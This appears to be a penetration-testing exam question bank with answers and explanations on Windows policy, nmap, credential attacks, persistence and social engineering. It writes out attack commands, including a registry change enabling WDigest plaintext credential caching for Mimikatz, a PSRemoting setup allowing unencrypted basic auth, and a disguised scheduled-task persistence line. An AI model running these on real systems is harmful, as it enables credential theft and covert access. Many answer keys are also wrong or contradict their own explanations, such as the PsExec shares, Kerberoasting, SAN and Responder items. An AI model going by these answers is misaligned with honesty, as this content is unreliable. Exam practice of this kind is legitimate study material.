You have just concluded a penetration test for a client. In your findings, you report that you were able to compromise several users' Windows accounts because they used passwords such as password, aaa, and 1234. Which of the following domain Group Policy settings could you recommend they implement to prevent weak password complexity? (Choose two.) A. Store passwords using reversible encryption. B. Password must meet complexity requirements. C. Minimum password length. D. Certificate path validation settings. E. Certificate services client - Auto-enrollment.
B and C. The "Password must meet complexity requirements" and the "Minimum password length" Group Policy settings can be used to enforce a degree of password complexity. By default, the "Password must meet complexity requirements" policy requires passwords be at least six characters long and contain characters from three of the following four categories: uppercase letters, lowercase letters, numbers, and special characters. The minimum password length defines the least number of characters that a password may contain
Which of the following describe the security risks associated with using the LLMNR protocol? (Choose two.) A. Data is transmitted as clear text. B. It lacks security controls. C. A malicious host can advertise itself as any host it wants to. D. It can be used to facilitate a DDoS attack. E. It creates excessive network traffic.
B and C. The LLMNR protocol has many security vulnerabilities that can be exploited in a penetration test. For example, it lacks security controls such as authentication. Because of this, a malicious host on the network can advertise itself as any host it wants to.
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax: ServerName = FS1 Which type of script could this be? (Choose two.) A.PowerShell B. Bash C. Ruby D. Python
B and D. When declaring a variable, both Bash and Python use the same syntax: variable_name = value.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. This will be an internal test. No third parties may be involved. Which of the following resources could be considered in-scope for the assessment? (Choose two.) A. The wireless networks used by neighboring organizations B. They key management system they use to store encryption keys C. The organization's Internet service provider (ISP) D. Their Amazon Web Service (AWS) content delivery system E. Their router configurations
B and E. The scope of this engagement in this scenario is limited to the internal network infrastructure. The organization's ISP, Amazon Web Services, and their neighbor's wireless networks are all owned by third parties and are therefore considered out of scope
You are performing a gray box penetration test for a client. The employees in the target organization use an application that was developed in-house to complete their day-to-day work. It crashes frequently, and you suspect that it is based on poorly written or outdated code. You want to analyze the application's execution when run by a typical end user to see whether it contains weaknesses that can be exploited. What should you do? A. Decompile the application's executable. B. Debug the application's executable. C. Capture and analyze network traffic generated by the application while employees are using it. D. Prioritize network traffic generated by the application using quality of service (Qos) settings on the switch.
B. Debuggers allow you to analyze an application as it executes. Typically, you can pause the execution of the application step by step or you can allow it to run until it reaches a certain point in the code. Doing this may allow you to identify a vulnerability that can be exploited as a part of a penetration test. However, you must have a strong background in programming or application testing to do this effectively.
A penetration tester is conducting a test, and after compromising a single workstation, the tester is able to maneuver laterally throughout the domain with very few roadblocks. Which migration strategies should be recommended for the report to the client? (Choose three.) A. Apply additional network access control. B. For all logons, require multifactor authentication. C. For each machine, randomize local administrator credentials. D. For local administrators, disable remote logons. E. Increase minimum password complexity requirements. F. Put each host into its own virtual local area network (VLAN). G. On every workstation, enable full-disk encryption.
B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn't have the key to "undo" the conversion
A user has noticed that their machine has been acting unpredictably over the past week. They have been experiencing slowness and input lag. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan where nothing is detected. What type of malware maybe affecting this machine? A. Backdoor B. Keylogger C. Ransomware D. Rootkit
B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.
Which type of vulnerability scan most closely approximates the perspective that an external hacker would have of the network? A. Credentialed B. Noncredentialed C. Full D. Compliance
B. A noncredentialed vulnerability scan is performed without authenticating to the network. Because of this, a noncredentialed scan most closely approximates the perspective an external hacker.
As part of a gray box penetration test, you need to capture packets on a wired network. How must the wired network interface in your laptop be configured to accomplish this? A. Set to monitor mode. B. Set to promiscuous mode. C. Set to capture mode. D. Set to IEEE 802.1x mode.
B. Before you can capture packets on a wired network, your network interface must be configured to run in promiscuous mode. Otherwise, it will discard all frames it receives that are not addressed specifically to its address
Cameron runs the following command via an administrative shell on a Windows system he has compromised. What has he accomplished? $command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force' A. He has enabled PowerShell for local users. B. He has set up PSRemoting. C. He has disabled remote command-line access. D. He has set up WSMan.
B. Cameron has enabled PowerShell remote access, known as PSRemoting, and has configured it to allow unencrypted sessions using basic auth. This configuration should worry any Windows administrator who finds it!
A penetration tester has run the following command on a Linux file system: Chmod 4111 /usr/bin/sudo What issues can be manipulated now? A. The kernel vulnerabilities B. The misconfigured sudo C. The sticky bits D. The unquoted service path
B. Chmod is a command and system call that is used to change the access permissions of file system objects (files and directories). Chmod 4111 (chmod a+rwx,u-rw,g-rw, o-rw,ug+s,+t,g-s,-t) sets permissions so that (U)ser / owner can't read, can't write, and can execute. (G)roup can't read, can't write and can execute. (O)thers can't read, can't write, and can execute. sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. In this scenario. the command chmod 4111 /usr/bin/sudo will misconfigure sudo.
You are a penetration tester, and you are discussing with the client the importance of maintaining confidentiality of any findings when performing a penetration test. Why is it important to maintain confidentiality when performing penetrations tests? Findings are legal documents containing privileged information. Findings can assist an attacker in compromising a system. Findings often contain company intellectual property. Findings could lead to consumer discontent if results are made public
B. Confidentiality controls seek to prevent disclosure attacks. Even though confidentiality agreements (CAs) are legal documents that help to enforce confidential relationships between two parties, this question asks why it is important to maintain confidentiality of findings. If an attacker was to receive word of findings during a penetration test, they could use those to compromise your client's system.
A penetration tester is testing the penetration of a client's network and managed to obtain access to a laptop. What would be the tester's next step to obtain credentials from the laptop? A. Brute force the user's password. B. Conduct a LLMNR/NETBIOS-NS query. C. Leverage the BeEF framework to capture credentials. D. Perform an ARP spoofing poisoning.
B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.
Which Windows Group Policy setting determines how long a user's account will stay locked if the wrong password has been entered too many times? A. Maximum password age B. Account lockout duration C. Account lockout threshold D. Minimum password age
B. The "Account lockout duration" Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack
Which option causes nmap to send scans from a spoofed IP address? A. -f B. -D C. -n D. -sF
B. The -D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.
Which of the following protocols is the Representational State Transfer (REST) web application architecture based on? A. FTP B. HTTP C. SMB D. LDAP
B. The Representational State Transfer (REST) web application architecture is based on the Hypertext Transfer Protocol (HTTP)
Which Bash script command will create a new variable named TOTAL and set its type to be integer? A. variable -i TOTAL B. declare -i TOTAL C. declare TOTAL -t integer D. TOTAL=integer
B. The declare -i TOTAL command will create the TOTAL variable and type it as integer.
Which of the following Windows features can be used to remotely manage Windows systems over a network connection? (Choose two.) A. SMB B. Telnet C. PS Remoting D. WinRM E. SSH
C and D. PowerShell (PS) Remoting allows you to run PowerShell cmdlets remotely on other Windows systems in your network environment. Windows Remote Management (WinRM) is a system that allows Windows administrators to manage remote systems using the WS Management protocol.
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance and phishing techniques, you have compromised the password for an employee's email account. You use this account to question other employees in an attempt to gather sensitive information and documents. Which exploits did you use in this scenario? (Choose two.) A. Shoulder surfing B. Phishing C. Impersonation D. Interrogation E. Elicitation
C and E. Impersonation is a social engineering technique that can be used by a penetration tester to gain the trust of the target organization's employees. In this scenario, the employees trusted the tester because emails appeared to be coming from another employee. The tester leveraged this trust to elicit sensitive information from those employees. This is sometimes called business email compromise.
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential customer data stored on an internal database server. You have asked the client for architectural diagrams. Which information should the client provide you with? (Choose two.) A. Swagger document B. Simple Object Access Protocol (SOAP) documentation C. Network diagrams D. XSD E. Facility maps
C and E. When requesting internal architectural diagrams as a part of a white box test, you should typically be supplied with documentation such as network diagrams and facility maps. You can use this information to map out the network topology and locate key infrastructure devices, such as switches, routers, and servers.
Which type of vulnerability scan sends SYN packets to network hosts to enumerate them? A. Discovery B. Full C. Stealth D. Compliance
C. A stealth scan enumerates hosts on the target network by sending them a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner.
Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether the system is a VM or not? A. Run system-detect-virt B. Run ls -l /dev/disk/by-id C. Run wmic baseboard to get manufacturer, product D. Run dmidecode to retrieve hardware information
C. All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool. You'll learn about VM escape and detection in Chapter 10.
A penetration tester has successfully captured the administrator credentials of a remote Windows machine. The tester is now attempting to access the system by using PsExec. However, the tester is denied permission. What shares must be accessible for a successful PsExec connection? A. ADMIN$ and C$ B. ADMIN$ and IPC$ C. ADMIN$ and SERVICES D. IPC$ and C$
C. PsExec is a tool designed to allow penetration testers to run programs on remote systems via SMB on port 445. That makes it an extremely useful tool. PsExec's ability to run processes remotely requires that both the local and remote computers have file and print sharing (i.e., the Workstation and Server services) enabled and the default Admin$ share, which is a hidden share that maps to the \windows directory
You are performing a black box penetration test. You need to run a vulnerability scan using nmap from an external network location outside the organization's firewall. The organization uses a low-bandwidth T1 line to connect to the Internet. How should you configure the scan? A. Use the -T5 option with the nmap command. B. Use the -T4 option with the nmap command. C. Use the -T2 option with the nmap command. D. Use the -T0 option with the nmap command.
C. Because a T1 line is limited to 1.54 Mbps, you must throttle the bandwidth used by the vulnerability scan. If you don't, you could easily use up all the available bandwidth and not leave any for critical business operations. You can use the -Tn option with the nmap command to throttle down the scans. Because of the low bandwidth of the connection, you should consider using either the -T2 or possibly even the -T1 option with the nmap command. The -T0 option would probably throttle the scan too much, making it take an inordinate amount of time to complete.
You are performing a black box penetration test for a client. The rules of engagement call for you to perform a vulnerability scan on the organization's many public-facing web servers. You have been allotted only a few hours in the test scope to perform the scans. What should you do? A. Skip the scan of the web servers. B. Perform a full scan of each and every the web server. C. Restrict the vulnerability scan to just those protocols commonly used on web servers. D. Perform a credentialed scan of the web servers.
C. Because you are scanning only web servers, you can probably constrain the vulnerability scan to just those ports and protocols commonly used by web servers. Performing a thorough scan of all ports and protocols would take considerably longer.
A penetration tester runs the chkconfig --del <servicename> command at the end of an engagement. What is the reason the tester may have done this? A. To check for persistence B. To enable persistence C. To remove the persistence D. To report persistence
C. Chkconfig is a tool for managing which run levels a service will run at. Chkconfig can be used to view or change the run level of a service. Using chkconfig --del <servicename> will set the named service to not run at the current run level and will remove the persistence
Chris cross compiles code for his exploit and then deploys it. Why would he cross-compile code? A. To make it run on multiple platforms B. To add additional libraries C. To run it on a different architecture D. To allow him to inspect the source code
C. Cross-compiling code is used when a target platform is on a different architecture. Chris may not have access to a compiler on his target machine, or he may need to compile the code for an exploit from his primary workstation, which is not the same architecture as his target
You have just concluded a penetration test for a client. During the test, you discovered that the organization's employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this? A. Technological B. People C. Process D. Scalable
C. Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.
After gaining access to a Windows system, Fred uses the following command: SchTasks /create /SC Weekly /TN "Antivirus" /TR C:\Users\SSmith\av.exe" /ST 09:00 What has he accomplished? A. He has set up a weekly antivirus scan. B. He has set up a job called "weekly." C. He has scheduled his own executable to run weekly. D. Nothing; this command will only run on Linux
C. Fred has used the scheduled tasks tool to set up a weekly run of av.exe from a user directory at 9 a.m. It is fair to assume in this example that Fred has gained access to SSmith's user directory and has placed his own av.exe file there and is attempting to make it look innocuous if administrators find it
A new client calls to schedule a gray box penetration test. You gather some basic information about the client over the phone, put together a scope for the test, and create a schedule for the test. You then hire several contractors to help conduct the test and begin the assessment on the scheduled date. Did you scope this assessment properly? A. Yes, proper scoping procedures were followed. B. No, the schedule should be defined before the scope is created. C. No, you should have spent more time understanding the target audience before scoping the assessment. D. No, the contracts should have helped create the scope of the assessment.
C. In this scenario, insufficient time was spent getting to know the target audience for the penetration test. Time should have been spent with the client to learn about their organization, the goals of the test, and so on. Only then should the scope be created.
Once the completion of testing is done for a client, the tester is prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to the client? A. The availability of patches and other remediations B. The levels of difficulty to exploit the identified vulnerabilities C. The risk tolerance of the client's organization D. The time it took to accomplish each step
C. In this scenario, it would be important to put the risk tolerance of the client's organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.
A client has asked you to run a white box penetration test. Her organization has offices in the United States, Indonesia, Thailand, and Singapore. To avoid international transportation of your penetration testing software, you upload it to your Google Drive account. Then you travel to each site, download the software, and run it locally on your laptop. Did you handle your penetration testing software appropriately in this scenario? A. Yes, using Google Drive to access the software internationally shields you from prosecution. B. No, most foreign nations block access to Google Drive. C. No, it is legal to transport most penetration testing software into these countries. D. No, it is illegal to transport most penetration testing software internationally using the Internet.
C. Many penetration testing tools may be covered by export restrictions. The United States prohibits the export of some types of software and hardware, including encryption tools. If you transfer these tools internationally over the Internet, you could be arrested.
Jacob wants to capture user hashes on a Windows network. Which tool could he select to gather these from broadcast messages? A. Metasploit B. Responder C. Impacket D. Wireshark
C. Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts. Impacket doesn't build this capability in but provides a wide range of related tools, including the ability to authenticate with hashes once you have captured them. If you're wondering about encountering this type of question on the exam, remember to eliminate the answers you are sure of to reduce the number of remaining options. Here, you can likely guess that Metasploit has a module for this, and Wireshark is a packet capture tool, so capturing broadcast traffic may require work, but would be possible. Now you're down to a 50/50 chance!
You are a penetration tester and have found a vulnerability in the client's domain controller. The vulnerability is that null sessions are enabled on the domain controller. What type of attack can be performed to take advantage of this vulnerability? A. Attempt a pass-the-hash attack to relay credentials. B. Attempt password brute forcing to log into the host. C. Attempt RID cycling to enumerate users and groups. D. Attempt session hijacking to impersonate a system account
C. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password-based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute force the user accounts when it's finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.
A security analyst is attempting to construct specialized XML files to test the security of the parsing functions of a Windows application during testing. Before starting to test the application, which of the following should the analyst request from the client? A.A protocol fuzzing utility B. Software development kit (SDK) for specific applications C. Samples of the Simple Object Access Protocol (SOAP) project files D. The Representational State Transfer (REST) application programming interface (API) documentation
C. SOAP is an API standard that relies on XML and related schemas. XML-based specifications are governed by XML Schema Definition (XSD) documents. Having a good reference of what a specific API supports can be valuable for a penetration tester. This question specifically asks about XML files, so the SOAP project files would be the most beneficial.
Which nmap timing option causes it to scan in Polite mode? A. -T0 B. -T1 C. -T2 D. -T3 E. -T4
C. The -T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.
A penetration tester has used Social Engineer Toolkit (SET) to make a copy of a company's cloud-hosted web mail portal and then sends an email to try to obtain the CEO's login credentials. This is an example of what type of attack? A. An elicitation attack B. An impersonation attack C. A spear phishing attack D. A whaling attack
C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack
You are performing a black box penetration test for a client. The rules of engagement call for you to perform a credentialed vulnerability scan, but you haven't been given administrative logon information. What could you do? A. Call off the test. The rules of engagement don't match the type of test. B. Ask the client to send you administrative credentials to run the scan. C. Conduct a spear phishing exploit to trick an internal user into revealing his or her credentials. D. Skip the enumeration and fingerprinting processes.
C. The fact that you don't have administrative credentials doesn't mean you have to forgo enumeration and fingerprinting nor does it mean you have to cancel the test. Instead, you could try to craft a spear phishing exploit to trick an internal user into revealing his or her logon credentials.
A web application developer included the following HTML code within a form page: <input type=hidden> This is an example of which unsecure code practice? A. Comments in source code B. Hidden elements C. Unauthorized use of functions/unprotected APIs D. Race conditions
C. The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user's browser (the DOM).
Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered? -rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture A. An encrypted file B. A hashed file C. A SUID file D. A SIP file
C. The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner. Chapter 10 discusses vulnerabilities in Linux, including how to leverage vulnerable SUID files
Why should you avoid using utilities such as Telnet, rlogin, and rsh when conducting a penetration test? A. They transfer data slowly. B. They provide only a command-line interface. C. They transmit data as clear text over the network. D. They are no longer supported by modern operating systems.
C. Utilities such as Telnet, rlogin, and rsh should be avoided when conducting a penetration test because they transmit data as clear text over the network. This makes it much easier for defenders to see what you are doing during the test, and you will likely get caught
During a black box assessment on a web-based application, a penetration tester is provided only with a URL to a login page. The following is the code and output: import requests from BeautifulSoup import BeautifulSoup request = requests.get ("https://www.willpanek.com/admin") respHeaders, respBody = request [0], request [1] if respHeader.statuscode = 200: soup = BeautifulSoup (respBody) soup = soup.FindAll ("div", {"type": "hidden"}) print respHeader.StatusCode, StatusMessage else: print respHeader.StatusCode, StatusMessage Output: 200 OK What is the penetration tester trying to do? A. Analyze the HTTP response code. B. Horizontally escalate privileges. C. Scrape the page for hidden fields. D. Search for HTTP headers.
C. Web scraping automatically extracts data and presents it in a format that a tester can easily make sense of. In this scenario, Python is being used as the scraping language compared to a powerful library called BeautifulSoup. BeautifulSoup is a Python package for parsing HTML and XML documents. It creates a parse tree for parsed pages that can be used to extract data from HTML, which is useful for web scraping. Beautiful Soup helps a tester pull particular content from a web page, remove the HTML markup, and save the information. It is a tool for web scraping that helps clean up and parse the documents that have been pulled down from the Web.
Which of the following should be used if a penetration tester is attempting to achieve persistence by compromising a Windows server? A. net session server | dsquery -user | net use c$ B. powershell && set-executionpolicy unrestricted C. reg save HKLM\System\CurrentControlSet\Services\Sv.reg D. schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
C. reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.) A. nmap 192.168.1.0 B. nmap 192.168.1.0-255 C. nmap 192.168.1.0 -m:255.255.255.0 D. nmap 192.168.1.0/24 E. nmap 192.168.1.1-254
D and E. The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.
Which types of network devices are commonly whitelisted in many NAC implementations? (Choose two.) A. Laptops B. Desktops C. Servers D. VOIP phones E. SCADA devices
D and E. VoIP phones and SCADA devices typically cannot be configured in a manner that allows them to meet the security policy requirements of a NAC system. For example, you usually can't install antimalware software on a VoIP phone or a SCADA device. Therefore, these systems are commonly whitelisted in NAC implementations, allowing them to bypass the requirements applied to other systems.
A penetration tester has successfully exploited a DM2 server that seems to be listening to an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.) A. Cain and Abel B. Netcat C. Nmap D. Secure Shell (SSH) E. Tcpdump F. Wireshark
D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.
You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to the information stored on an internal database server. Which information should the client provide you with prior to starting the test? A. Architectural diagrams B. Swagger document C. XSD D. Network diagrams
D. A black box penetration test should simulate the view an external attacker would have of the network. Therefore, the tester should have little or no knowledge of the internal network
A penetration tester is currently in the middle of a test when the client asks the tester to add more addresses. Which of the following defines the target list that the tester can follow? A. The end-user license agreement B. The master services agreement (MSA) C. The rules of engagement (RoE) D. The statement of work (SOW)
D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.
Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer? A. Stored/persistent B. Clickjacking C. Reflected D. Document Object Model (DOM)
D. In a DOM XSS exploit, the attacker exploits weaknesses in the victim's web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.
Which of the following is the best course of action for a penetration tester who is required to perform open-source intelligence (OSINT) on the staff at a target company after completing the infrastructure aspect? A. Go to the client location and use impersonation to obtain information from the staff. B. Using social engineering techniques, try to obtain staff information by calling the company. C. Search the Internet for information on the staff, such as visiting social networking sites. D. Send spoofed emails to the staff to see if they will respond with sensitive information.
D. In this scenario, since you are trying to preform OSINT on the staff of the company, it would be best to send spoofed emails to the staff to see whether they will respond with sensitive information. Penetration testers need to be ready to incorporate social engineering in their test plan if allowed by the rules of engagement and included in the scope of work.
Angela wants to run John the Ripper against a hashed password file she has acquired from a compromise. What information does she need to know to successfully crack the file? A. A sample word list B. The hash used C. The number of passwords D. None of the above
D. John includes automatic hash type detection, so Angela can simply feed John the Ripper the hashed password file. If it is in a format that John recognizes, it will attempt to crack the passwords.
Which open source research source is maintained by the U.S. government's National Institute of Science and Technology and provides a summary of current security? A. CERT B. Full Disclosure C. CVE D. NVD
D. The National Vulnerability Database (NVD) is maintained by the U.S. government's National Institute of Science and Technology. The NVD can be accessed at https://nvd .nist.gov. This website provides a summary of current security vulnerabilities ranked by their severity
You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack? A. The tester compromised a Windows device and dumps the Local Security Authority (LSA) secrets. B. The tester needs to retrieve the Security Account Manager (SAM) database and crack the password hashes. C. The tester compromised a user account that has limited privileges and needs to target other accounts for lateral movement. D. The tester compromised an account and needs to dump hashes and plaintext passwords from the system.
D. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools. Kerberoasting is a four-step process: Scan Active Directory for user accounts with service principal names (SPNs) set. Request service tickets using the SPNs. Extract the service tickets from memory and save to a file. Conduct an offline brute-force attack against the passwords in the service tickets.
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem? A. Encrypt the passwords. B. Implement password complexity requirements. C. Implement intruder lockout. D. Randomize the local Administrator credentials.
D. Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.
Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise? A. Nmap B. Traceroute C. regmon D. Whois
D. Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor. You'll read more about OSINT in Chapter 3
A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN? A. Can protect multiple domains B. Does not require a trusted certificate authority (CA) C. Protects unlimited subdomain D. Provides extended site validation
D. Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation
Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one? A. Enforce password history B. Minimum password length C. Minimum password age D. Maximum password age
D. The "Maximum password age" Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.
Which open source research source ranks security vulnerabilities by their severity? A. CERT B. Full Disclosure C. CVE D. NVD
D. The National Vulnerability Database (NVD) website provides a summary of current security vulnerabilities ranked by their severity.
Which control structure is considered to be a flow control structure? A. while loop B. for loop C. until loop D. if/then/else
D. The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates
You are asked to perform a penetration test for an organization with offices located in New York City, Los Angeles, and Fargo. Which cybersecurity laws and regulations do you need to check as you scope the assessment? A. U.S. federal cybersecurity law B. State cybersecurity laws in New York, California, and North Dakota C. Local cybersecurity laws in each physical location D. Interpol regulations
D. The laws and regulations that apply to penetration testing and penetration testers vary from state to state within the United States. That means you need to understand what laws apply to the work you're doing. In this scenario, you need to check all federal, state, and local laws that apply to the assessment you plan to carry out. It is recommended that you retain the services of an attorney to keep yourself out of trouble.
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project? A. lockusr B. chmod C. chage D. passwd
D. To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn't want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd -l command followed by the name of the user.
A penetration tester is running a phishing test and receives a shell from an internal computer that is running the Windows 10 operating system. The tester decides that he wants to use Mimikatz to perform credential harvesting. The tester wants to allow for credential caching. Which of the following registry changes would allow this? reg add A. HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG-DWORD /d 0 reg add B.HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1 reg add C.HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1 reg add D.HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1
D. Using reg add adds a new subkey or entry into the registry. The syntax is as follows: reg add <KeyName> /v <ValueName> /t <DataType> /d <Data> KeyName specifies the full path of the subkey or entry to be added. /v <ValueName> specifies the name of the registry entry to be added under the specified subkey. /t <DataType> specifies the type for the registry entry. /d <Data> specifies the data for the new registry entry. Penetration testers often focus on using the easiest attack vector to achieve their objectives. One common attack method is a tool called Mimikatz. It can steal cleartext credentials from the memory of compromised Windows systems. When the WDigest Authentication protocol is enabled, plaintext passwords are stored in the Local Security Authority Subsystem Service (LSASS), exposing them to theft. WDigest is disabled by default in Windows 10.
A penetration tester has recently finished a test that revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and that management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while providing a low-effort and short-term solution? (Choose two.) A. Identify and remove the dynamic SQL from the stored procedures. B. Identify and remove the inline SQL statements from the code. C. Identify and sanitize all user inputs. D. Identify the source of malicious input and block the IP address. E. Use a blacklist validation for the SQL statements. F. Use a whitelist validation for the SQL statements.
E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.
In a Bash script, you need to prompt the user to select from one of seven different options presented with the echo command. Which control structure would best evaluate the user's input and run the appropriate set of commands? A. while loop B. for loop C. until loop D. if/then/else E. case
E. The case structure is the best option presented to evaluate the user's choice of multiple selections and run the appropriate set of commands as a result.
You are generating a written report of findings after a penetration test. Based on the results of the test, you have created a list of recommendations you feel the client should focus on. Where should you include your recommendations in the report? A. Executive summary B. Methodology C. Findings and remediation D. Metrics and measures E. Conclusion
E. When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section